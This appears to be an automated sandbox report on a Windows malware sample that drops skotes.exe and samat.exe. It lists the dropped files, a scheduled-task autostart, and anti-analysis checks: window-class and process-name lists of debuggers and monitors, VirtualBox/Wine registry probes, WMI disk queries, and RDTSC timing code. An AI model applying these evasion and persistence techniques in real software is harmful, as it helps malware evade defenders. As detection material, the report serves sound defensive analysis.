Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libffi-8.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32\pywintypes313.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libssl-3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt Jump to behavior

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12C76C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError, 7_2_00007FF7E12C76C0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\dxdiag.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\dxdiag.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DXENSERVICE.EXE4P
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DWIRESHARK.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DX64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DFIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DOLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DQEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DVMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DPROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1253 second address: 8B125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F8481503866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B125F second address: 8B1263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1651 second address: 8B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1657 second address: 8B165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B165E second address: 8B1683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503870h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1683 second address: 8B1691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F8480743926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B193C second address: 8B194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B194C second address: 8B1962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1962 second address: 8B1968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1968 second address: 8B1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B57E3 second address: 8B5813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jmp 00007F8481503874h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5813 second address: 8B5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F848074392Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5835 second address: 8B5839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B58CF second address: 8B58DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5A5A second address: 8B5AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8481503868h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor cx, 77B8h 0x0000002a pushad 0x0000002b mov edx, dword ptr [ebp+122D35B4h] 0x00000031 movzx esi, cx 0x00000034 popad 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D1F0Ch], esi 0x0000003d push E7EFC6E9h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 js 00007F8481503866h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5AAD second address: 8B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5AB2 second address: 8B5B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 18103997h 0x0000000e mov ecx, dword ptr [ebp+122D3868h] 0x00000014 push 00000003h 0x00000016 and cl, 00000032h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D19F8h], esi 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F8481503868h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A2Fh], ebx 0x00000043 push BBD99289h 0x00000048 pushad 0x00000049 jbe 00007F8481503868h 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5B83 second address: 8B5C26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8480743928h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1878h], ecx 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 add edx, dword ptr [ebp+122D38A4h] 0x00000037 pop ecx 0x00000038 push ecx 0x00000039 xor edi, dword ptr [ebp+122D3718h] 0x0000003f pop ecx 0x00000040 call 00007F8480743929h 0x00000045 jmp 00007F8480743935h 0x0000004a push eax 0x0000004b jmp 00007F8480743930h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push esi 0x00000055 jp 00007F848074392Ch 0x0000005b pop esi 0x0000005c mov eax, dword ptr [eax] 0x0000005e pushad 0x0000005f jmp 00007F848074392Ch 0x00000064 jbe 00007F848074392Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5C26 second address: 8B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8481503868h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1E38h], edx 0x00000030 push 00000003h 0x00000032 call 00007F848150386Ah 0x00000037 movzx edx, dx 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d mov esi, 07D34AC9h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F8481503868h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F8481503873h 0x00000063 push B13CA0F6h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5CDE second address: 8D5CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5CE3 second address: 8D5CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ACB19 second address: 8ACB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8480743926h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007F8480743931h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BB5 second address: 8D3BDF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8481503878h 0x0000000f js 00007F8481503866h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BDF second address: 8D3BFD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F8480743928h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BFD second address: 8D3C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C01 second address: 8D3C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C07 second address: 8D3C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C18 second address: 8D3C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3EE0 second address: 8D3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
